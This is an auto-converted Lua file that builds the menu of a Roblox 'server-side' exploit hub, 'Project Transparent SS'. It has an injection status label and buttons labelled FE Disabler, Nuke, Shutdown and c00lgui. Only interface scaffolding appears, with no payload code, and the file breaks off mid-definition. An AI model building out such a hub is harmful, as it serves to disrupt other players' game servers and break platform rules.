--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
]=]

-- Instances: 181 | Scripts: 39 | Modules: 1 | Tags: 0
local G2L = {};

-- StarterGui.ScreenGui
G2L["1"] = Instance.new("ScreenGui", game:GetService("CoreGui"));
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;
G2L["1"]["ResetOnSpawn"] = false;


-- StarterGui.ScreenGui.Scanner
G2L["2"] = Instance.new("LocalScript", G2L["1"]);
G2L["2"]["Name"] = [[Scanner]];


-- StarterGui.ScreenGui.Frame
G2L["3"] = Instance.new("Frame", G2L["1"]);
G2L["3"]["BorderSizePixel"] = 0;
G2L["3"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3"]["Size"] = UDim2.new(0, 407, 0, 296);
G2L["3"]["Position"] = UDim2.new(0.33455, 0, 0.28788, 0);
G2L["3"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3"]["BackgroundTransparency"] = 0.5;


-- StarterGui.ScreenGui.Frame.Dragify
G2L["4"] = Instance.new("LocalScript", G2L["3"]);
G2L["4"]["Name"] = [[Dragify]];


-- StarterGui.ScreenGui.Frame.UIStroke
G2L["5"] = Instance.new("UIStroke", G2L["3"]);



-- StarterGui.ScreenGui.Frame.Frame
G2L["6"] = Instance.new("Frame", G2L["3"]);
G2L["6"]["BorderSizePixel"] = 0;
G2L["6"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6"]["Size"] = UDim2.new(0, 407, 0, 2);
G2L["6"]["Position"] = UDim2.new(0, 0, 0.11486, 0);
G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Frame
G2L["7"] = Instance.new("Frame", G2L["3"]);
G2L["7"]["BorderSizePixel"] = 0;
G2L["7"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7"]["Size"] = UDim2.new(0, 3, 0, 262);
G2L["7"]["Position"] = UDim2.new(0.10565, 0, 0.11486, 0);
G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.TextLabel
G2L["8"] = Instance.new("TextLabel", G2L["3"]);
G2L["8"]["TextWrapped"] = true;
G2L["8"]["BorderSizePixel"] = 0;
G2L["8"]["TextSize"] = 14;
G2L["8"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["8"]["TextScaled"] = true;
G2L["8"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["8"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["8"]["BackgroundTransparency"] = 1;
G2L["8"]["Size"] = UDim2.new(0, 407, 0, 34);
G2L["8"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8"]["Text"] = [[Project Transparent SS]];


-- StarterGui.ScreenGui.Frame.TextLabel.UIStroke
G2L["9"] = Instance.new("UIStroke", G2L["8"]);



-- StarterGui.ScreenGui.Frame.TextLabel.ImageButton
G2L["a"] = Instance.new("ImageButton", G2L["8"]);
G2L["a"]["BorderSizePixel"] = 0;
G2L["a"]["BackgroundTransparency"] = 1;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["Image"] = [[rbxassetid://74120900238837]];
G2L["a"]["Size"] = UDim2.new(0, 34, 0, 34);
G2L["a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["a"]["Position"] = UDim2.new(0.91646, 0, 0, 0);


-- StarterGui.ScreenGui.Frame.TextLabel.ImageButton.LocalScript
G2L["b"] = Instance.new("LocalScript", G2L["a"]);



-- StarterGui.ScreenGui.Frame.TextLabel.ImageButton.UIStroke
G2L["c"] = Instance.new("UIStroke", G2L["a"]);



-- StarterGui.ScreenGui.Frame.TextLabel.ImageButton.UICorner
G2L["d"] = Instance.new("UICorner", G2L["a"]);



-- StarterGui.ScreenGui.Frame.page1
G2L["e"] = Instance.new("Frame", G2L["3"]);
G2L["e"]["BorderSizePixel"] = 0;
G2L["e"]["BackgroundColor3"] = Color3.fromRGB(91, 91, 91);
G2L["e"]["Size"] = UDim2.new(0, 361, 0, 260);
G2L["e"]["Position"] = UDim2.new(0.11302, 0, 0.12162, 0);
G2L["e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["e"]["Name"] = [[page1]];
G2L["e"]["BackgroundTransparency"] = 0.5;


-- StarterGui.ScreenGui.Frame.page1.ImageLabel
G2L["f"] = Instance.new("ImageLabel", G2L["e"]);
G2L["f"]["BorderSizePixel"] = 0;
G2L["f"]["BackgroundColor3"] = Color3.fromRGB(46, 46, 46);
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["f"]["Image"] = [[rbxasset://textures/ui/GuiImagePlaceholder.png]];
G2L["f"]["Size"] = UDim2.new(0, 100, 0, 100);
G2L["f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["f"]["BackgroundTransparency"] = 1;
G2L["f"]["Position"] = UDim2.new(0.02263, 0, 0.03066, 0);


-- StarterGui.ScreenGui.Frame.page1.ImageLabel.LocalScript
G2L["10"] = Instance.new("LocalScript", G2L["f"]);



-- StarterGui.ScreenGui.Frame.page1.ImageLabel.UIStroke
G2L["11"] = Instance.new("UIStroke", G2L["f"]);
G2L["11"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["11"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.page1.TextLabel
G2L["12"] = Instance.new("TextLabel", G2L["e"]);
G2L["12"]["TextWrapped"] = true;
G2L["12"]["BorderSizePixel"] = 0;
G2L["12"]["TextSize"] = 14;
G2L["12"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["12"]["TextScaled"] = true;
G2L["12"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["12"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["12"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["12"]["BackgroundTransparency"] = 1;
G2L["12"]["Size"] = UDim2.new(0, 245, 0, 25);
G2L["12"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["12"]["Text"] = [[Welcome, player]];
G2L["12"]["Position"] = UDim2.new(0.32133, 0, 0.02692, 0);


-- StarterGui.ScreenGui.Frame.page1.TextLabel.LocalScript
G2L["13"] = Instance.new("LocalScript", G2L["12"]);



-- StarterGui.ScreenGui.Frame.page1.TextLabel.UIStroke
G2L["14"] = Instance.new("UIStroke", G2L["12"]);



-- StarterGui.ScreenGui.Frame.page1.TextLabel
G2L["15"] = Instance.new("TextLabel", G2L["e"]);
G2L["15"]["TextWrapped"] = true;
G2L["15"]["BorderSizePixel"] = 0;
G2L["15"]["TextSize"] = 14;
G2L["15"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["15"]["TextScaled"] = true;
G2L["15"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["15"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["15"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["15"]["BackgroundTransparency"] = 1;
G2L["15"]["Size"] = UDim2.new(0, 245, 0, 39);
G2L["15"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["15"]["Text"] = [[This is a rework of CTRL SS]];
G2L["15"]["Position"] = UDim2.new(0.32133, 0, 0.12308, 0);


-- StarterGui.ScreenGui.Frame.page1.TextLabel.UIStroke
G2L["16"] = Instance.new("UIStroke", G2L["15"]);



-- StarterGui.ScreenGui.Frame.page1.TextLabel
G2L["17"] = Instance.new("TextLabel", G2L["e"]);
G2L["17"]["TextWrapped"] = true;
G2L["17"]["BorderSizePixel"] = 0;
G2L["17"]["TextSize"] = 14;
G2L["17"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["17"]["TextScaled"] = true;
G2L["17"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["17"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["17"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["17"]["BackgroundTransparency"] = 1;
G2L["17"]["Size"] = UDim2.new(0, 244, 0, 44);
G2L["17"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["17"]["Text"] = [[Now a more advanced scanner!]];
G2L["17"]["Position"] = UDim2.new(0.32133, 0, 0.24231, 0);


-- StarterGui.ScreenGui.Frame.page1.TextLabel.UIStroke
G2L["18"] = Instance.new("UIStroke", G2L["17"]);



-- StarterGui.ScreenGui.Frame.page1.Status
G2L["19"] = Instance.new("TextLabel", G2L["e"]);
G2L["19"]["TextWrapped"] = true;
G2L["19"]["BorderSizePixel"] = 0;
G2L["19"]["TextSize"] = 14;
G2L["19"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["19"]["TextScaled"] = true;
G2L["19"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["19"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["19"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["19"]["BackgroundTransparency"] = 1;
G2L["19"]["Size"] = UDim2.new(0, 353, 0, 34);
G2L["19"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["19"]["Text"] = [[Status: NOT Injected]];
G2L["19"]["Name"] = [[Status]];
G2L["19"]["Position"] = UDim2.new(0.02216, 0, 0.86923, 0);


-- StarterGui.ScreenGui.Frame.page1.Status.UIStroke
G2L["1a"] = Instance.new("UIStroke", G2L["19"]);



-- StarterGui.ScreenGui.Frame.page1.TextLabel
G2L["1b"] = Instance.new("TextLabel", G2L["e"]);
G2L["1b"]["TextWrapped"] = true;
G2L["1b"]["BorderSizePixel"] = 0;
G2L["1b"]["TextSize"] = 14;
G2L["1b"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["1b"]["TextScaled"] = true;
G2L["1b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1b"]["BackgroundTransparency"] = 1;
G2L["1b"]["Size"] = UDim2.new(0, 353, 0, 31);
G2L["1b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1b"]["Text"] = [[Age days: {age}]];
G2L["1b"]["Position"] = UDim2.new(0.02216, 0, 0.75, 0);


-- StarterGui.ScreenGui.Frame.page1.TextLabel.LocalScript
G2L["1c"] = Instance.new("LocalScript", G2L["1b"]);



-- StarterGui.ScreenGui.Frame.page1.TextLabel.UIStroke
G2L["1d"] = Instance.new("UIStroke", G2L["1b"]);



-- StarterGui.ScreenGui.Frame.page1.TextLabel
G2L["1e"] = Instance.new("TextLabel", G2L["e"]);
G2L["1e"]["TextWrapped"] = true;
G2L["1e"]["BorderSizePixel"] = 0;
G2L["1e"]["TextSize"] = 14;
G2L["1e"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["1e"]["TextScaled"] = true;
G2L["1e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1e"]["BackgroundTransparency"] = 1;
G2L["1e"]["Size"] = UDim2.new(0, 343, 0, 44);
G2L["1e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1e"]["Text"] = [[A SS Hub dedicated to provide necessities for SS exploiting.]];
G2L["1e"]["Position"] = UDim2.new(0.02216, 0, 0.58077, 0);


-- StarterGui.ScreenGui.Frame.page1.TextLabel.UIStroke
G2L["1f"] = Instance.new("UIStroke", G2L["1e"]);



-- StarterGui.ScreenGui.Frame.page1.TextButton
G2L["20"] = Instance.new("TextButton", G2L["e"]);
G2L["20"]["TextWrapped"] = true;
G2L["20"]["BorderSizePixel"] = 0;
G2L["20"]["TextSize"] = 14;
G2L["20"]["TextScaled"] = true;
G2L["20"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["20"]["BackgroundColor3"] = Color3.fromRGB(84, 84, 84);
G2L["20"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["20"]["BackgroundTransparency"] = 0.7;
G2L["20"]["Size"] = UDim2.new(0, 343, 0, 39);
G2L["20"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["20"]["Text"] = [[Untitled SS Hub]];
G2L["20"]["Position"] = UDim2.new(0.02216, 0, 0.43077, 0);


-- StarterGui.ScreenGui.Frame.page1.TextButton.LocalScript
G2L["21"] = Instance.new("LocalScript", G2L["20"]);



-- StarterGui.ScreenGui.Frame.page1.TextButton.UIStroke
G2L["22"] = Instance.new("UIStroke", G2L["20"]);



-- StarterGui.ScreenGui.Frame.page1.TextButton.UIStroke
G2L["23"] = Instance.new("UIStroke", G2L["20"]);
G2L["23"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page1.TextButton.UICorner
G2L["24"] = Instance.new("UICorner", G2L["20"]);



-- StarterGui.ScreenGui.Frame.page3
G2L["25"] = Instance.new("Frame", G2L["3"]);
G2L["25"]["Visible"] = false;
G2L["25"]["BorderSizePixel"] = 0;
G2L["25"]["BackgroundColor3"] = Color3.fromRGB(91, 91, 91);
G2L["25"]["Size"] = UDim2.new(0, 361, 0, 260);
G2L["25"]["Position"] = UDim2.new(0.11302, 0, 0.12162, 0);
G2L["25"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["25"]["Name"] = [[page3]];
G2L["25"]["BackgroundTransparency"] = 0.5;


-- StarterGui.ScreenGui.Frame.page3.TextLabel
G2L["26"] = Instance.new("TextLabel", G2L["25"]);
G2L["26"]["TextWrapped"] = true;
G2L["26"]["BorderSizePixel"] = 0;
G2L["26"]["TextSize"] = 14;
G2L["26"]["TextScaled"] = true;
G2L["26"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["26"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["26"]["TextColor3"] = Color3.fromRGB(171, 255, 0);
G2L["26"]["BackgroundTransparency"] = 1;
G2L["26"]["Size"] = UDim2.new(0, 361, 0, 29);
G2L["26"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["26"]["Text"] = [[Scripts (SERVER-SIDE)]];


-- StarterGui.ScreenGui.Frame.page3.TextLabel.UIStroke
G2L["27"] = Instance.new("UIStroke", G2L["26"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame
G2L["28"] = Instance.new("ScrollingFrame", G2L["25"]);
G2L["28"]["Active"] = true;
G2L["28"]["BorderSizePixel"] = 0;
G2L["28"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["28"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["28"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["28"]["Size"] = UDim2.new(0, 361, 0, 231);
G2L["28"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["28"]["Position"] = UDim2.new(0, 0, 0.11154, 0);
G2L["28"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["28"]["ScrollBarThickness"] = 3;
G2L["28"]["BackgroundTransparency"] = 11;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.UIStroke
G2L["29"] = Instance.new("UIStroke", G2L["28"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.UIListLayout
G2L["2a"] = Instance.new("UIListLayout", G2L["28"]);
G2L["2a"]["Padding"] = UDim.new(0, 1);
G2L["2a"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["2b"] = Instance.new("TextButton", G2L["28"]);
G2L["2b"]["TextWrapped"] = true;
G2L["2b"]["BorderSizePixel"] = 0;
G2L["2b"]["TextSize"] = 14;
G2L["2b"]["TextScaled"] = true;
G2L["2b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2b"]["BackgroundColor3"] = Color3.fromRGB(84, 84, 84);
G2L["2b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2b"]["BackgroundTransparency"] = 0.7;
G2L["2b"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["2b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2b"]["Text"] = [[c00lgui]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["2c"] = Instance.new("LocalScript", G2L["2b"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["2d"] = Instance.new("UIStroke", G2L["2b"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["2e"] = Instance.new("UIStroke", G2L["2b"]);
G2L["2e"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["2f"] = Instance.new("TextButton", G2L["28"]);
G2L["2f"]["TextWrapped"] = true;
G2L["2f"]["BorderSizePixel"] = 0;
G2L["2f"]["TextSize"] = 14;
G2L["2f"]["TextScaled"] = true;
G2L["2f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2f"]["BackgroundColor3"] = Color3.fromRGB(84, 84, 84);
G2L["2f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2f"]["BackgroundTransparency"] = 0.7;
G2L["2f"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["2f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2f"]["Text"] = [[Custom chat]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["30"] = Instance.new("LocalScript", G2L["2f"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["31"] = Instance.new("UIStroke", G2L["2f"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["32"] = Instance.new("UIStroke", G2L["2f"]);
G2L["32"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["33"] = Instance.new("TextButton", G2L["28"]);
G2L["33"]["TextWrapped"] = true;
G2L["33"]["BorderSizePixel"] = 0;
G2L["33"]["TextSize"] = 14;
G2L["33"]["TextScaled"] = true;
G2L["33"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["33"]["BackgroundColor3"] = Color3.fromRGB(84, 84, 84);
G2L["33"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["33"]["BackgroundTransparency"] = 0.7;
G2L["33"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["33"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["33"]["Text"] = [[FE Disabler]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["34"] = Instance.new("LocalScript", G2L["33"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["35"] = Instance.new("UIStroke", G2L["33"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["36"] = Instance.new("UIStroke", G2L["33"]);
G2L["36"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["37"] = Instance.new("TextButton", G2L["28"]);
G2L["37"]["TextWrapped"] = true;
G2L["37"]["BorderSizePixel"] = 0;
G2L["37"]["TextSize"] = 14;
G2L["37"]["TextScaled"] = true;
G2L["37"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["37"]["BackgroundColor3"] = Color3.fromRGB(84, 84, 84);
G2L["37"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["37"]["BackgroundTransparency"] = 0.7;
G2L["37"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["37"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["37"]["Text"] = [[TOPKEK v3]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["38"] = Instance.new("LocalScript", G2L["37"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["39"] = Instance.new("UIStroke", G2L["37"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["3a"] = Instance.new("UIStroke", G2L["37"]);
G2L["3a"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["3b"] = Instance.new("TextButton", G2L["28"]);
G2L["3b"]["TextWrapped"] = true;
G2L["3b"]["BorderSizePixel"] = 0;
G2L["3b"]["TextSize"] = 14;
G2L["3b"]["TextScaled"] = true;
G2L["3b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3b"]["BackgroundColor3"] = Color3.fromRGB(84, 84, 84);
G2L["3b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["3b"]["BackgroundTransparency"] = 0.7;
G2L["3b"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["3b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3b"]["Text"] = [[HD admin]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["3c"] = Instance.new("LocalScript", G2L["3b"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["3d"] = Instance.new("UIStroke", G2L["3b"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["3e"] = Instance.new("UIStroke", G2L["3b"]);
G2L["3e"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["3f"] = Instance.new("TextButton", G2L["28"]);
G2L["3f"]["TextWrapped"] = true;
G2L["3f"]["BorderSizePixel"] = 0;
G2L["3f"]["TextSize"] = 14;
G2L["3f"]["TextScaled"] = true;
G2L["3f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3f"]["BackgroundColor3"] = Color3.fromRGB(84, 84, 84);
G2L["3f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["3f"]["BackgroundTransparency"] = 0.7;
G2L["3f"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["3f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3f"]["Text"] = [[Nuke]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["40"] = Instance.new("LocalScript", G2L["3f"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["41"] = Instance.new("UIStroke", G2L["3f"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["42"] = Instance.new("UIStroke", G2L["3f"]);
G2L["42"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["43"] = Instance.new("TextButton", G2L["28"]);
G2L["43"]["TextWrapped"] = true;
G2L["43"]["BorderSizePixel"] = 0;
G2L["43"]["TextSize"] = 14;
G2L["43"]["TextScaled"] = true;
G2L["43"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["43"]["BackgroundColor3"] = Color3.fromRGB(84, 84, 84);
G2L["43"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["43"]["BackgroundTransparency"] = 0.7;
G2L["43"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["43"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["43"]["Text"] = [[Shutdown]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["44"] = Instance.new("LocalScript", G2L["43"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["45"] = Instance.new("UIStroke", G2L["43"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["46"] = Instance.new("UIStroke", G2L["43"]);
G2L["46"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.ImageButton
G2L["47"] = Instance.new("ImageButton", G2L["3"]);
G2L["47"]["BorderSizePixel"] = 0;
G2L["47"]["BackgroundTransparency"] = 1;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["47"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["47"]["Image"] = [[rbxassetid://11347112400]];
G2L["47"]["Size"] = UDim2.new(0, 43, 0, 43);
G2L["47"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["47"]["Position"] = UDim2.new(0, 0, 0.12162, 0);


-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["48"] = Instance.new("LocalScript", G2L["47"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UIStroke
G2L["49"] = Instance.new("UIStroke", G2L["47"]);



-- StarterGui.ScreenGui.Frame.ImageButton
G2L["4a"] = Instance.new("ImageButton", G2L["3"]);
G2L["4a"]["BorderSizePixel"] = 0;
G2L["4a"]["BackgroundTransparency"] = 1;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["4a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4a"]["Image"] = [[rbxassetid://11570895459]];
G2L["4a"]["Size"] = UDim2.new(0, 43, 0, 43);
G2L["4a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4a"]["Position"] = UDim2.new(0, 0, 0.26689, 0);


-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["4b"] = Instance.new("LocalScript", G2L["4a"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UIStroke
G2L["4c"] = Instance.new("UIStroke", G2L["4a"]);



-- StarterGui.ScreenGui.Frame.ImageButton
G2L["4d"] = Instance.new("ImageButton", G2L["3"]);
G2L["4d"]["BorderSizePixel"] = 0;
G2L["4d"]["BackgroundTransparency"] = 1;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["4d"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4d"]["Image"] = [[rbxassetid://1365082776]];
G2L["4d"]["Size"] = UDim2.new(0, 43, 0, 43);
G2L["4d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4d"]["Position"] = UDim2.new(0, 0, 0.41216, 0);


-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["4e"] = Instance.new("LocalScript", G2L["4d"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UIStroke
G2L["4f"] = Instance.new("UIStroke", G2L["4d"]);



-- StarterGui.ScreenGui.Frame.page4
G2L["50"] = Instance.new("Frame", G2L["3"]);
G2L["50"]["Visible"] = false;
G2L["50"]["BorderSizePixel"] = 0;
G2L["50"]["BackgroundColor3"] = Color3.fromRGB(91, 91, 91);
G2L["50"]["Size"] = UDim2.new(0, 361, 0, 260);
G2L["50"]["Position"] = UDim2.new(0.11302, 0, 0.12162, 0);
G2L["50"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["50"]["Name"] = [[page4]];
G2L["50"]["BackgroundTransparency"] = 0.5;


-- StarterGui.ScreenGui.Frame.page4.ScrollingFrame
G2L["51"] = Instance.new("ScrollingFrame", G2L["50"]);
G2L["51"]["Active"] = true;
G2L["51"]["BorderSizePixel"] = 0;
